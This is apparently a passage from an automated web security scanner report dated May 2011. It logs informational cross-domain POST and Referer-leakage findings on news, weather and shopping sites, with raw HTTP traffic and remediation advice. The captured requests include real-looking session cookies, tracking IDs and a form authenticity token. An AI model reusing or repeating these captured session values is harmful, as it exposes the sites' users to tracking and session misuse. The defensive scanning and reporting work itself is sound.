<input name="partner_id" value="csmonitor.com" type="hidden" /><input name="placement" value="recommendations" type="hidden" /><input name="extra_1" value="http://www.csmonitor.com/Business" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge" for="u530759_2"><input value="Sign Up" type="submit" id="u530759_2" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance(&quot;u530759_1&quot;).login();"><b>log in</b></a> to see what your friends are recommending.</div></div><div class="fbConnectWidgetContent phs pts"><div class="fbRecommendationWidgetContent" style="visibility:hidden;"><div class="UIImageBlock clearfix pas fbRecommendation RES_6b52e61bddc969e3"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.csmonitor.com/Innovation/Horizons/2011/0503/How-Osama-bin-Laden-s-death-sparked-a-fake-Martin-Luther-King-quote" title="How Osama bin Laden&#039;s death sparked a fake Martin Luther King quote" target="_top"><img class="img" src="http://www.csmonitor.com/var/ezflow_site/storage/images/media/images/0503-martin-luther-king-quotes/10049983-1-eng-US/0503-martin-luther-king-quotes_thumbnail_90.jpg" /></a><div class="UIImageBlock_Content UIImageBlock_SMALL_Content"><strong><a class="fbMonitor" href="http://www.csmonitor.com/Innovation/Horizons/2011/0503/How-Osama-bin-Laden-s-death-sparked-a-fake-Martin-Luther-King-quote" target="_top">How Osama bin Laden&#039;s death sparked a fake Martin Luther King quote</a></strong><div class="recommendations_metadata">8,739 people shared this.</div></div></div><div class="UIImageBlock clearfix pas fbRecommendation RES_776119d85571861e"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.csmonitor.com/USA/Society/2011/0505/Cinco-de-Mayo-Six-fun-facts-about-the-Fifth-of-May" title="Cinco de Mayo: Six fun facts about the Fifth
...[SNIP]...

Request 2

GET /plugins/recommendations.php?site=www.csmonitor.com&width=270&height=590&header=false&colorscheme=light&font=arial&border_color=%23fff HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.62.38
X-Cnection: close
Date: Mon, 09 May 2011 15:35:44 GMT
Content-Length: 19097

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<input name="partner_id" value="" type="hidden" /><input name="placement" value="recommendations" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge" for="u534452_2"><input value="Sign Up" type="submit" id="u534452_2" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance(&quot;u534452_1&quot;).login();"><b>log in</b></a> to see what your friends are recommending.</div></div><div class="fbConnectWidgetContent phs pts"><div class="fbRecommendationWidgetContent" style="visibility:hidden;"><div class="UIImageBlock clearfix pas fbRecommendation RES_6b52e61bddc969e3"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.csmonitor.com/Innovation/Horizons/2011/0503/How-Osama-bin-Laden-s-death-sparked-a-fake-Martin-Luther-King-quote" title="How Osama bin Laden&#039;s death sparked a fake Martin Luther King quote" target="_top"><img class="img" src="http://www.csmonitor.com/var/ezflow_site/storage/images/media/images/0503-martin-luther-king-quotes/10049983-1-eng-US/0503-martin-luther-king-quotes_thumbnail_90.jpg" /></a><div class="UIImageBlock_Content UIImageBlock_SMALL_Content"><strong><a class="fbMonitor" href="http://www.csmonitor.com/Innovation/Horizons/2011/0503/How-Osama-bin-Laden-s-death-sparked-a-fake-Martin-Luther-King-quote" target="_top">How Osama bin Laden&#039;s death sparked a fake Martin Luther King quote</a></strong><div class="recommendations_metadata">8,739 people shared this.</div></div></div><div class="UIImageBlock clearfix pas fbRecommendation RES_776119d85571861e"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.csmonitor.com/USA/Society/2011/0505/Cinco-de-Mayo-Six-fun-facts-about-the-Fifth-of-May" title="Cinco de Mayo: Six fun facts about the Fifth of May" target="_top"><img class="img" src="http://www.csmonitor.com/var/ezflow_site/storage
...[SNIP]...

15.8. http://www.fox8live.com/mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.fox8live.com
Path:   /mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx

Request 1

GET /mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/wireless/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response 1

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:41:38 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n30 ( iad-agg-n33), ms iad-agg-n33 ( origin)
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 57286
Connection: keep-alive
Content-Length: 57286


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
src="http://stp.fox8live.com/common/pagereporting/nettracker/ntpagetag.gif?js=0&amp;pv=0&amp;lc=http%3a%2f%2fwww.fox8live.com%2fmostpopular%2fstory.aspx%3fcontent_id%3dywVthjF5R0-TVfelFm18GA%26&amp;rf=http%3a%2f%2fwww.fox8live.com%2fwireless%2fdefault.aspx" height="1" width="1" border="0" hspace="0" vspace="0" alt="" />
</noscript>
<!-- END: NetTracker Page Tag -->
<!-- Start Quantcast tag -->
<script type="text/javascript">
_qoptions={
qacct:"p-3eDTKkJu0A1JU",
labels:""
};
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-3eDTKkJu0A1JU.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
<!-- End Quantcast tag -->

<form name="aspnetForm" method="post" action="/mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
<input type="hidden" name="ctl00_ctl00_ctl00_ctl00_CommonPage_CommonBody_CommonContent_CommonLeftColumn_Main_V___EmailStoryWindow_EmailStoryControl___iCap_answer" id="ctl00_ctl00_ctl00_ctl00_CommonPage_CommonBody_CommonContent_CommonLeftColumn_Main_V___EmailStoryWindow_EmailStoryControl___iCap_answer" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="ctl00_ctl00_ctl00_ctl00_CommonPage_CommonBody_CommonContent_CommonLeftColumn_Main_V___EmailStoryWindow_EmailStoryControl___iCap_encrypted" id="ctl00_ctl00_ctl00_ctl00_CommonPage_CommonBody_CommonContent_CommonLeftColumn_Main_V___EmailStoryWindow_EmailStoryControl___iCap_encrypted" value="i7wpuRFyrpFili5QNbqWeN5ub9B3gPZ0cY6cOwpQHmE=" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzOTYxNzMwOTQPZBYCZg9kFgJmD2QWAmYPZBYCZg9kFgICBQ9kFgICAw9kFgQCGw9kFgJmD2QWBgIBDxAPZBYCHghvbkNoYW5nZQV6ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2N0bDAwX2N0bDAwX2N0bDAwX2N0bDAwX0NvbW1vblBhZ2VfU2VhcmNoQmFyX19fUG93ZXJlZEJ5Jykuc3JjID0gdGhpc1t0aGlzLnNlbGVjdGVkSW5kZXhdLmltZ1VybDsPFgJmAgEWAhAFEFNlYXJjaCBUaGlzIFN
...[SNIP]...

Request 2

GET /mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response 2

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:41:43 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n30 ( iad-agg-n33), ms iad-agg-n33 ( origin)
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 57231
Connection: keep-alive
Content-Length: 57231


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
src="http://stp.fox8live.com/common/pagereporting/nettracker/ntpagetag.gif?js=0&amp;pv=0&amp;lc=http%3a%2f%2fwww.fox8live.com%2fmostpopular%2fstory.aspx%3fcontent_id%3dywVthjF5R0-TVfelFm18GA%26&amp;rf=" height="1" width="1" border="0" hspace="0" vspace="0" alt="" />
</noscript>
<!-- END: NetTracker Page Tag -->
<!-- Start Quantcast tag -->
<script type="text/javascript">
_qoptions={
qacct:"p-3eDTKkJu0A1JU",
labels:""
};
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-3eDTKkJu0A1JU.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
<!-- End Quantcast tag -->

<form name="aspnetForm" method="post" action="/mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
<input type="hidden" name="ctl00_ctl00_ctl00_ctl00_CommonPage_CommonBody_CommonContent_CommonLeftColumn_Main_V___EmailStoryWindow_EmailStoryControl___iCap_answer" id="ctl00_ctl00_ctl00_ctl00_CommonPage_CommonBody_CommonContent_CommonLeftColumn_Main_V___EmailStoryWindow_EmailStoryControl___iCap_answer" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="ctl00_ctl00_ctl00_ctl00_CommonPage_CommonBody_CommonContent_CommonLeftColumn_Main_V___EmailStoryWindow_EmailStoryControl___iCap_encrypted" id="ctl00_ctl00_ctl00_ctl00_CommonPage_CommonBody_CommonContent_CommonLeftColumn_Main_V___EmailStoryWindow_EmailStoryControl___iCap_encrypted" value="3Qsnum5DiBLhIIHhxqhyNwr4C5/zZb7hlH0fFlCUCIc=" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzOTYxNzMwOTQPZBYCZg9kFgJmD2QWAmYPZBYCZg9kFgICBQ9kFgICAw9kFgQCGw9kFgJmD2QWBgIBDxAPZBYCHghvbkNoYW5nZQV6ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2N0bDAwX2N0bDAwX2N0bDAwX2N0bDAwX0NvbW1vblBhZ2VfU2VhcmNoQmFyX19fUG93ZXJlZEJ5Jykuc3JjID0gdGhpc1t0aGlzLnNlbGVjdGVkSW5kZXhdLmltZ1VybDsPFgJmAgEWAhAFEFNlYXJjaCBUaGlzIFNpdGUFAzI2NWcQBQ5TZWFyY2ggdGhlIFdlYgUDMjY2Z2RkAgMPD2QWAh
...[SNIP]...

15.9. https://www.groupon.com/users  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.groupon.com
Path:   /users

Request 1

POST /users HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
Referer: https://www.groupon.com/users/new
Cache-Control: max-age=0
Origin: https://www.groupon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55
Content-Length: 231

authenticity_token=ICfp1OvnKSBwXOdEcwa6DN9FNr34UQxyH%2FNwl5Q3Ga4%3D&user%5Bfull_name%5D=&user%5Bemail_address%5D=&user%5Bpassword%5D=&user%5Bpassword_confirmation%5D=&user%5Baccept_terms%5D=0&user%5Ba
...[SNIP]...

Response 1

HTTP/1.1 302 Moved Temporarily
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:36:13 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:36:13 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: auth_token=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:36:13 GMT; HttpOnly
Status: 302
Location: https://www.groupon.com/users/new
X-Runtime: 62
Cache-Control: no-cache
Content-Length: 99

<html><body>You are being <a href="https://www.groupon.com/users/new">redirected</a>.</body></html>

Request 2

POST /users HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
Cache-Control: max-age=0
Origin: https://www.groupon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55
Content-Length: 231

authenticity_token=ICfp1OvnKSBwXOdEcwa6DN9FNr34UQxyH%2FNwl5Q3Ga4%3D&user%5Bfull_name%5D=&user%5Bemail_address%5D=&user%5Bpassword%5D=&user%5Bpassword_confirmation%5D=&user%5Baccept_terms%5D=0&user%5Ba
...[SNIP]...

Response 2

HTTP/1.1 302 Moved Temporarily
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:36:43 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:36:42 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: auth_token=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:36:43 GMT; HttpOnly
Status: 302
Location: https://www.groupon.com/
X-Runtime: 627
Cache-Control: no-cache
Content-Length: 90

<html><body>You are being <a href="https://www.groupon.com/">redirected</a>.</body></html>

16. Cross-domain POST  previous  next
There are 4 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


16.1. http://radar.weather.gov/Conus/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://radar.weather.gov
Path:   /Conus/index.php

Issue detail

The page contains a form which POSTs data to the domain www.srh.noaa.gov. The form contains the following fields:

Request

GET /Conus/index.php HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Referer: http://www.srh.noaa.gov/lmrfc/quickbrief.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=299
Expires: Mon, 09 May 2011 15:41:39 GMT
Date: Mon, 09 May 2011 15:36:40 GMT
Connection: close
Content-Length: 61964

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head>
<title>NWS - Doppler Radar National Mosaic</title>
<meta name="title" content="NWS -
...[SNIP]...
</span><form method="POST" action="http://www.srh.noaa.gov/zipcity.php">&nbsp; &nbsp;<span class="searchinput">
...[SNIP]...

16.2. http://radar.weather.gov/radar.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://radar.weather.gov
Path:   /radar.php

Issue detail

The page contains a form which POSTs data to the domain www.srh.noaa.gov. The form contains the following fields:

Request

GET /radar.php?rid=hdx&product=N0R&overlay=11101111&loop=no HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Referer: http://radar.weather.gov/Conus/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=31
Expires: Mon, 09 May 2011 15:38:29 GMT
Date: Mon, 09 May 2011 15:37:58 GMT
Connection: close
Content-Length: 25348

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head>
<title>NWS radar image from Holloman Air Force Base, NM</title>
<meta name=
...[SNIP]...
</span><form method="POST" action="http://www.srh.noaa.gov/zipcity.php">&nbsp;&nbsp;<span class="searchinput">
...[SNIP]...

16.3. http://www.csmonitor.com/Business  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /Business

Issue detail

The page contains a form which POSTs data to the domain links.mkt1259.com. The form contains the following fields:

Request

GET /Business HTTP/1.1
Host: www.csmonitor.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=02a30c09840b7ee1:T=1304954833:S=ALNI_MYQDe4BczMf1S4cz7YNVrMV1DZneg; __qca=P0-103944696-1304954839995; s_vmonthnum=1306904400533%26vn%3D1; s_vi=[CS]v1|26E40435851D1B0E-6000010600650711[CE]; s_cc=true; s_nr=1304955268151-New; c_m=undefinedburpburp; rvd=1304955268153%3E0%3A1; rvd_s=1; s_depth=4; s_lv=1304955268156; s_lv_s=First%20Visit; s_invisit=true; s_vnum=1308843268157%26vn%3D1; s_monthinvisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Content-Type: text/html; charset=utf-8
X-Powered-By: eZ Publish
Vary: Accept-Encoding
Content-Language: en-US
Served-by:
Pragma:
Cache-Control: max-age=19
Expires: Mon, 09 May 2011 15:35:12 GMT
Date: Mon, 09 May 2011 15:34:53 GMT
Connection: close
Content-Length: 83875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


        <title> B
...[SNIP]...
<div id="sign-up-form">
       <form name="form" style="padding: 0; margin: 0;" method="post" action="http://links.mkt1259.com/servlet/UserSignUp?f=231711&postMethod=HTML&m=0&j=MAS2">
       <!-- e-mail field -->
...[SNIP]...

16.4. http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /Business/2011/0509/Gas-prices-start-to-head-down

Issue detail

The page contains a form which POSTs data to the domain links.mkt1259.com. The form contains the following fields:

Request

GET /Business/2011/0509/Gas-prices-start-to-head-down HTTP/1.1
Host: www.csmonitor.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=02a30c09840b7ee1:T=1304954833:S=ALNI_MYQDe4BczMf1S4cz7YNVrMV1DZneg; __qca=P0-103944696-1304954839995; s_vmonthnum=1306904400533%26vn%3D1; s_vi=[CS]v1|26E40435851D1B0E-6000010600650711[CE]; c_m=undefinedburpburp; s_cc=true; s_depth=6; s_nr=1304955476727-New; rvd=1304955476728%3E0%3A1; rvd_s=1; s_lv=1304955476729; s_lv_s=First%20Visit; s_invisit=true; s_vnum=1308843476731%26vn%3D1; s_monthinvisit=true; s_sq=fcocscsm%3D%2526pid%253Dbusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Content-Type: text/html; charset=utf-8
X-Powered-By: eZ Publish
Vary: Accept-Encoding
Content-Language: en-US
Served-by:
Pragma:
Cache-Control: max-age=73
Expires: Mon, 09 May 2011 15:39:13 GMT
Date: Mon, 09 May 2011 15:38:00 GMT
Connection: close
Content-Length: 74098

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


    <title> Ga
...[SNIP]...
<div id="sign-up-form">
       <form name="form" style="padding: 0; margin: 0;" method="post" action="http://links.mkt1259.com/servlet/UserSignUp?f=231711&postMethod=HTML&m=0&j=MAS2">
       <!-- e-mail field -->
...[SNIP]...

17. Cross-domain Referer leakage  previous  next
There are 35 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


17.1. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ads/?t=i&f=j&p=5112&pl=bad56300&rnd=88105499721132220&clkurl=http://ib.adnxs.com/click/mpmZmZmZ-T-amZmZmZn5PwAAAAAAAAxAAAAAAAAADEAAAAAAAAAMQODGbwg69CFkSsYda6b2ziWrCchNAAAAAC4hAAC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gB3C04AEA8BAgUCAAQAAAAAfxzeJwAAAAA./cnd=!eRMkCwj25QIQx8kKGAAg0ccBKE4xAAAAAAAADEBCEwgAEAAYACABKP7__________wFIAFAAWPcWYABolgU./referrer=http%3A%2F%2Fwww.csmonitor.com%2FBusiness/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBAFOqqwnITbTYJoX0lAf-jfHKCdfq-NMBl6GU7BjZ59HSHwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi02NzQzNjIyNTI1MjAyNTcyoAHD8v3sA7IBEXd3dy5jc21vbml0b3IuY29tugEKMzAweDI1MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc5gCwAzAAgTIAoXSzwrgAgDqAhAzMDB4MjUwQ19HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtygYYY1WjNaewxmNUetXvrYk6kjZg%26client%3Dca-pub-6743622525202572%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
